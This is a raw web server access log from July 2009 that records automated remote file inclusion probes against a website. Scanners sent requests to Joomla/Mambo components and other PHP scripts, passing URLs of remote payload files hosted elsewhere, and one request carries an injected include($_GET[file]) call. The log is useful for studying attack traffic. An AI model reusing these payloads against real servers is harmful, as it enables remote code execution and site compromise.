66.197.183.21 - - [05/Jul/2009:09:02:59 -0700] "GET /logs//index2.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://203.64.102.151/id.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.826" "www.puaga.com"
88.191.37.60 - - [05/Jul/2009:09:03:00 -0700] "GET /logs/access_090604.log////?_SERVER[DOCUMENT_ROOT]=http://game24x7.com/_a?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
94.229.66.202 - - [05/Jul/2009:09:03:12 -0700] "GET /logs/access_090531.log/index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.810" "www.puaga.com"
88.191.37.60 - - [05/Jul/2009:09:03:18 -0700] "GET /logs/access_090604.log////?_SERVER[DOCUMENT_ROOT]=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
94.229.66.202 - - [05/Jul/2009:09:03:35 -0700] "GET /logs/index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.810" "www.puaga.com"
94.229.66.202 - - [05/Jul/2009:09:03:35 -0700] "GET /index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 200 6125 "-" "libwww-perl/5.810" "www.puaga.com"
94.229.66.202 - - [05/Jul/2009:09:03:37 -0700] "GET /logs/access_090606.log/index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.810" "www.puaga.com"
94.229.66.202 - - [05/Jul/2009:09:03:37 -0700] "GET /logs/access_090517.log/index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.810" "www.puaga.com"
66.197.183.21 - - [05/Jul/2009:09:06:43 -0700] "GET /logs/access_090513.log//index2.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://203.64.102.151/id.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.826" "www.puaga.com"
88.191.37.60 - - [05/Jul/2009:09:06:44 -0700] "GET /logs/access_090604.log////?_SERVER[DOCUMENT_ROOT]=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.226.134.29 - - [05/Jul/2009:09:07:12 -0700] "GET /logs/access_090620.log//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.avanceinternet.com/cms/media/id.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
66.11.230.36 - - [05/Jul/2009:09:07:23 -0700] "GET /logs/access_090517.log//appserv/main.php?appserv_root=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.11.230.36 - - [05/Jul/2009:09:07:23 -0700] "GET /appserv/main.php?appserv_root=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.11.230.36 - - [05/Jul/2009:09:07:23 -0700] "GET /logs//appserv/main.php?appserv_root=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
94.229.66.202 - - [05/Jul/2009:09:07:29 -0700] "GET /logs/access_090519.log%20/index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.810" "www.puaga.com"
88.191.37.60 - - [05/Jul/2009:09:07:42 -0700] "GET /logs/access_090521.log%20/index.php?option=com_custompages&cpage=http://ohmyflash.com/form/idev.txt%0D?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
94.229.66.202 - - [05/Jul/2009:09:07:51 -0700] "GET /logs/access_090526.log%20/index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.810" "www.puaga.com"
88.191.37.60 - - [05/Jul/2009:09:07:52 -0700] "GET /logs/access_090615.log%20/index.php?option=com_custompages&cpage=http://ohmyflash.com/form/idev.txt%0D?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
200.226.134.29 - - [05/Jul/2009:09:08:12 -0700] "GET /logs/access_090620.log//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.avanceinternet.com/cms/media/id.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
82.194.87.219 - - [05/Jul/2009:09:09:29 -0700] "GET /logs///modules/vwar/admin/admin.php?vwar_root=http://www.animeforum.com/impex/id? HTTP/1.1" 404 5258 "-" "libwww-perl/5.822" "www.puaga.com"
66.11.230.36 - - [05/Jul/2009:09:10:04 -0700] "GET /logs/access_090517.log%20%20//appserv/main.php?appserv_root=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.37.60 - - [05/Jul/2009:09:10:05 -0700] "GET /logs/access_090604.log////?_SERVER[DOCUMENT_ROOT]=http://game24x7.com/_a?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.231.1.215 - - [05/Jul/2009:09:10:10 -0700] "GET //include/mail.inc.php?skin_board_path=http://www.dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.231.1.215 - - [05/Jul/2009:09:10:10 -0700] "GET /logs///include/mail.inc.php?skin_board_path=http://www.dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.231.1.215 - - [05/Jul/2009:09:10:10 -0700] "GET /logs/access_090517.log///include/mail.inc.php?skin_board_path=http://www.dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.231.1.215 - - [05/Jul/2009:09:10:32 -0700] "GET /logs/access_090511.log///include/mail.inc.php?skin_board_path=http://www.dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.11.230.36 - - [05/Jul/2009:09:11:36 -0700] "GET /logs/access_090602.log%20%20//appserv/main.php?appserv_root=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
84.17.129.100 - - [05/Jul/2009:09:12:09 -0700] "GET /logs/access_090611.log/?sourcedir=http://fritzcomforthomes.com/copyright[1].txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.97.61.43 - - [05/Jul/2009:09:14:04 -0700] "GET /logs/access_090624.log//administrator/components/com_moofaq/css/errors.php?error=http://www.mazda-bay.co.uk/includes/id.txt???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
203.97.61.43 - - [05/Jul/2009:09:14:04 -0700] "GET /administrator/components/com_moofaq/css/errors.php?error=http://www.mazda-bay.co.uk/includes/id.txt???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
203.97.61.43 - - [05/Jul/2009:09:14:04 -0700] "GET /logs//administrator/components/com_moofaq/css/errors.php?error=http://www.mazda-bay.co.uk/includes/id.txt???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
203.97.61.43 - - [05/Jul/2009:09:14:04 -0700] "GET /logs/access_090619.log//administrator/components/com_moofaq/css/errors.php?error=http://www.mazda-bay.co.uk/includes/id.txt???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
94.229.66.202 - - [05/Jul/2009:09:16:02 -0700] "GET /logs/access_090601.log/index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.810" "www.puaga.com"
94.229.66.202 - - [05/Jul/2009:09:16:02 -0700] "GET /index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 200 6125 "-" "libwww-perl/5.810" "www.puaga.com"
94.229.66.202 - - [05/Jul/2009:09:16:09 -0700] "GET /logs/index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.810" "www.puaga.com"
94.229.66.202 - - [05/Jul/2009:09:16:40 -0700] "GET /logs/access_090521.log/index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.810" "www.puaga.com"
218.150.78.235 - - [05/Jul/2009:09:16:43 -0700] "GET //include/mail.inc.php?skin_board_path=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.150.78.235 - - [05/Jul/2009:09:16:43 -0700] "GET /logs///include/mail.inc.php?skin_board_path=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.150.78.235 - - [05/Jul/2009:09:16:45 -0700] "GET //include/mail.inc.php?skin_board_path=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.150.78.235 - - [05/Jul/2009:09:16:45 -0700] "GET /logs///include/mail.inc.php?skin_board_path=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.150.78.235 - - [05/Jul/2009:09:16:49 -0700] "GET /logs/access_090517.log///include/mail.inc.php?skin_board_path=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.150.78.235 - - [05/Jul/2009:09:16:52 -0700] "GET /logs/access_090517.log///include/mail.inc.php?skin_board_path=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
94.229.66.202 - - [05/Jul/2009:09:17:08 -0700] "GET /logs/access_090510.log/index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.810" "www.puaga.com"
94.229.66.202 - - [05/Jul/2009:09:17:08 -0700] "GET /index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 200 6125 "-" "libwww-perl/5.810" "www.puaga.com"
94.229.66.202 - - [05/Jul/2009:09:17:11 -0700] "GET /logs/index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.810" "www.puaga.com"
82.194.87.219 - - [05/Jul/2009:09:17:14 -0700] "GET /logs///components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.animeforum.com/impex/id? HTTP/1.1" 404 5258 "-" "libwww-perl/5.822" "www.puaga.com"
94.229.66.202 - - [05/Jul/2009:09:17:19 -0700] "GET /logs/access_090606.log/index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.810" "www.puaga.com"
94.229.66.202 - - [05/Jul/2009:09:17:25 -0700] "GET /logs/index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.810" "www.puaga.com"
94.229.66.202 - - [05/Jul/2009:09:17:28 -0700] "GET /logs/access_090523.log/index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.810" "www.puaga.com"
94.229.66.202 - - [05/Jul/2009:09:17:28 -0700] "GET /logs/access_090514.log/index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.810" "www.puaga.com"
94.229.66.202 - - [05/Jul/2009:09:17:31 -0700] "GET /logs/index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.810" "www.puaga.com"
94.229.66.202 - - [05/Jul/2009:09:17:31 -0700] "GET /index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 200 6125 "-" "libwww-perl/5.810" "www.puaga.com"
218.150.78.235 - - [05/Jul/2009:09:17:32 -0700] "GET /logs/access_090511.log///include/mail.inc.php?skin_board_path=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
94.229.66.202 - - [05/Jul/2009:09:17:34 -0700] "GET /index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 200 6125 "-" "libwww-perl/5.810" "www.puaga.com"
94.229.66.202 - - [05/Jul/2009:09:17:34 -0700] "GET /logs/access_090523.log/index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.810" "www.puaga.com"
218.150.78.235 - - [05/Jul/2009:09:17:46 -0700] "GET /logs/access_090511.log///include/mail.inc.php?skin_board_path=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
94.229.66.202 - - [05/Jul/2009:09:17:51 -0700] "GET /logs/access_090521.log/index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.810" "www.puaga.com"
94.229.66.202 - - [05/Jul/2009:09:19:50 -0700] "GET /logs/access_090606.log%20/index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.810" "www.puaga.com"
82.194.87.219 - - [05/Jul/2009:09:21:10 -0700] "GET /logs///modules/vwar/admin/admin.php?vwar_root=http://www.animeforum.com/impex/id? HTTP/1.1" 404 5258 "-" "libwww-perl/5.822" "www.puaga.com"
94.229.66.202 - - [05/Jul/2009:09:21:31 -0700] "GET /logs/access_090516.log%20/index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.810" "www.puaga.com"
123.242.165.138 - - [05/Jul/2009:09:21:58 -0700] "GET /logs/access_090517.log//index2.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://sunset-travel.ro/ro/includes/id.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
123.242.165.138 - - [05/Jul/2009:09:21:59 -0700] "GET /index2.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://sunset-travel.ro/ro/includes/id.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
123.242.165.138 - - [05/Jul/2009:09:22:00 -0700] "GET /logs//index2.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://sunset-travel.ro/ro/includes/id.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
201.232.54.48 - - [05/Jul/2009:09:22:29 -0700] "GET /logs/access_090514.log///?DOCUMENT_ROOT=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
94.229.66.202 - - [05/Jul/2009:09:23:07 -0700] "GET /logs/access_090609.log%20/index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.810" "www.puaga.com"
94.229.66.202 - - [05/Jul/2009:09:23:09 -0700] "GET /logs/access_090516.log%20/index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.810" "www.puaga.com"
93.184.70.253 - - [05/Jul/2009:09:27:17 -0700] "GET /logs/access_090605.log/?sourcedir=http://www.ksi-klasa.pl//104/Rosid.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
93.184.70.253 - - [05/Jul/2009:09:27:17 -0700] "GET /logs/?sourcedir=http://www.ksi-klasa.pl//104/Rosid.txt?? HTTP/1.1" 200 4799 "-" "libwww-perl/5.805" "www.puaga.com"
93.184.70.253 - - [05/Jul/2009:09:27:18 -0700] "GET /?sourcedir=http://www.ksi-klasa.pl//104/Rosid.txt?? HTTP/1.1" 200 6125 "-" "libwww-perl/5.805" "www.puaga.com"
193.87.99.18 - - [05/Jul/2009:09:27:19 -0700] "GET /logs/access_090605.log/?sourcedir=http://www.ksi-klasa.pl//104/Rosid.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
193.87.99.18 - - [05/Jul/2009:09:27:19 -0700] "GET /logs/?sourcedir=http://www.ksi-klasa.pl//104/Rosid.txt?? HTTP/1.1" 200 4799 "-" "libwww-perl/5.79" "www.puaga.com"
193.87.99.18 - - [05/Jul/2009:09:27:19 -0700] "GET /?sourcedir=http://www.ksi-klasa.pl//104/Rosid.txt?? HTTP/1.1" 200 6125 "-" "libwww-perl/5.79" "www.puaga.com"
119.201.245.60 - - [05/Jul/2009:09:27:22 -0700] "GET /logs/modules/xfsection/modify.php?dir_module=http://www.anarchitetti.it/site/uploads/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
119.201.245.60 - - [05/Jul/2009:09:27:22 -0700] "GET /logs/access_090516.log/modules/xfsection/modify.php?dir_module=http://www.anarchitetti.it/site/uploads/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
119.201.245.60 - - [05/Jul/2009:09:27:23 -0700] "GET /logs/access_090608.log/modules/xfsection/modify.php?dir_module=http://www.anarchitetti.it/site/uploads/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
119.201.245.60 - - [05/Jul/2009:09:27:24 -0700] "GET /modules/xfsection/modify.php?dir_module=http://www.anarchitetti.it/site/uploads/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
93.184.70.253 - - [05/Jul/2009:09:27:34 -0700] "GET /logs/access_090611.log/?sourcedir=http://www.ksi-klasa.pl//104/Rosid.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
193.87.99.18 - - [05/Jul/2009:09:27:36 -0700] "GET /logs/access_090611.log/?sourcedir=http://www.ksi-klasa.pl//104/Rosid.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
114.200.199.144 - - [05/Jul/2009:09:28:30 -0700] "GET /logs/errors.php?error=http://law-rich.co.kr////mae_movie/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
114.200.199.144 - - [05/Jul/2009:09:28:30 -0700] "GET /logs/access_090521.log%20%20/errors.php?error=http://law-rich.co.kr////mae_movie/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
114.200.199.144 - - [05/Jul/2009:09:28:30 -0700] "GET /errors.php?error=http://law-rich.co.kr////mae_movie/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
114.200.199.144 - - [05/Jul/2009:09:28:30 -0700] "GET /logs/errors.php?error=http://law-rich.co.kr////mae_movie/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
114.200.199.144 - - [05/Jul/2009:09:28:30 -0700] "GET /logs/access_090521.log%20%20/errors.php?error=http://law-rich.co.kr////mae_movie/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
114.200.199.144 - - [05/Jul/2009:09:28:30 -0700] "GET /errors.php?error=http://law-rich.co.kr////mae_movie/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
114.200.199.144 - - [05/Jul/2009:09:28:36 -0700] "GET /logs/access_090525.log%20%20/errors.php?error=http://law-rich.co.kr////mae_movie/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
114.200.199.144 - - [05/Jul/2009:09:28:36 -0700] "GET /logs/access_090525.log%20%20/errors.php?error=http://law-rich.co.kr////mae_movie/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
114.200.199.144 - - [05/Jul/2009:09:28:42 -0700] "GET /errors.php?error=http://law-rich.co.kr////mae_movie/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
114.200.199.144 - - [05/Jul/2009:09:28:42 -0700] "GET /logs/access_090521.log%20%20/errors.php?error=http://law-rich.co.kr////mae_movie/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
114.200.199.144 - - [05/Jul/2009:09:28:42 -0700] "GET /logs/errors.php?error=http://law-rich.co.kr////mae_movie/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
114.200.199.144 - - [05/Jul/2009:09:28:48 -0700] "GET /logs/access_090525.log%20%20/errors.php?error=http://law-rich.co.kr////mae_movie/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
202.70.83.4 - - [05/Jul/2009:09:29:52 -0700] "GET /logs/access_090605.log/?sourcedir=http://www.ksi-klasa.pl//104/Rosid.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
202.70.83.4 - - [05/Jul/2009:09:29:52 -0700] "GET /logs/?sourcedir=http://www.ksi-klasa.pl//104/Rosid.txt?? HTTP/1.1" 200 4799 "-" "libwww-perl/5.803" "www.puaga.com"
202.70.83.4 - - [05/Jul/2009:09:29:52 -0700] "GET /?sourcedir=http://www.ksi-klasa.pl//104/Rosid.txt?? HTTP/1.1" 200 6125 "-" "libwww-perl/5.803" "www.puaga.com"
123.242.165.138 - - [05/Jul/2009:09:30:36 -0700] "GET /logs/access_090513.log//index2.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://sunset-travel.ro/ro/includes/id.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
119.201.245.60 - - [05/Jul/2009:09:30:37 -0700] "GET /logs/access_090608.log%20%20/modules/xfsection/modify.php?dir_module=http://www.anarchitetti.it/site/uploads/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
119.201.245.60 - - [05/Jul/2009:09:30:37 -0700] "GET /logs/access_090516.log%20%20/modules/xfsection/modify.php?dir_module=http://www.anarchitetti.it/site/uploads/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
202.70.83.4 - - [05/Jul/2009:09:31:14 -0700] "GET /logs/access_090611.log/?sourcedir=http://www.ksi-klasa.pl//104/Rosid.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
114.200.199.144 - - [05/Jul/2009:09:35:12 -0700] "GET /weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://law-rich.co.kr////mae_movie/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
114.200.199.144 - - [05/Jul/2009:09:35:13 -0700] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://law-rich.co.kr////mae_movie/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
114.200.199.144 - - [05/Jul/2009:09:35:13 -0700] "GET /logs/access_090523.log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://law-rich.co.kr////mae_movie/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
114.200.199.144 - - [05/Jul/2009:09:35:33 -0700] "GET /logs/access_090610.log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://law-rich.co.kr////mae_movie/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
114.200.199.144 - - [05/Jul/2009:09:35:35 -0700] "GET /weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://law-rich.co.kr////mae_movie/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
114.200.199.144 - - [05/Jul/2009:09:35:35 -0700] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://law-rich.co.kr////mae_movie/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
114.200.199.144 - - [05/Jul/2009:09:35:35 -0700] "GET /logs/access_090523.log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://law-rich.co.kr////mae_movie/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
114.200.199.144 - - [05/Jul/2009:09:35:35 -0700] "GET /logs/access_090610.log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://law-rich.co.kr////mae_movie/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
114.200.199.144 - - [05/Jul/2009:09:35:51 -0700] "GET /logs/access_090523.log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://law-rich.co.kr////mae_movie/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
114.200.199.144 - - [05/Jul/2009:09:35:51 -0700] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://law-rich.co.kr////mae_movie/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
114.200.199.144 - - [05/Jul/2009:09:35:51 -0700] "GET /weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://law-rich.co.kr////mae_movie/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
114.200.199.144 - - [05/Jul/2009:09:35:51 -0700] "GET /logs/access_090610.log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://law-rich.co.kr////mae_movie/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.248.208.177 - - [05/Jul/2009:09:37:02 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://fritzcomforthomes.com/idd.txt?%0D?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
80.248.208.177 - - [05/Jul/2009:09:37:02 -0700] "GET /logs/access_090531.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://fritzcomforthomes.com/idd.txt?%0D?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
80.248.208.177 - - [05/Jul/2009:09:37:02 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://fritzcomforthomes.com/idd.txt?%0D?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
80.248.208.177 - - [05/Jul/2009:09:37:10 -0700] "GET /logs/access_090524.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://fritzcomforthomes.com/idd.txt?%0D?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
114.200.199.144 - - [05/Jul/2009:09:37:20 -0700] "GET /logs/access_090521.log/errors.php?error=http://law-rich.co.kr////mae_movie/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
114.200.199.144 - - [05/Jul/2009:09:37:20 -0700] "GET /logs/access_090525.log/errors.php?error=http://law-rich.co.kr////mae_movie/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
114.200.199.144 - - [05/Jul/2009:09:37:30 -0700] "GET /logs/access_090521.log/errors.php?error=http://law-rich.co.kr////mae_movie/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
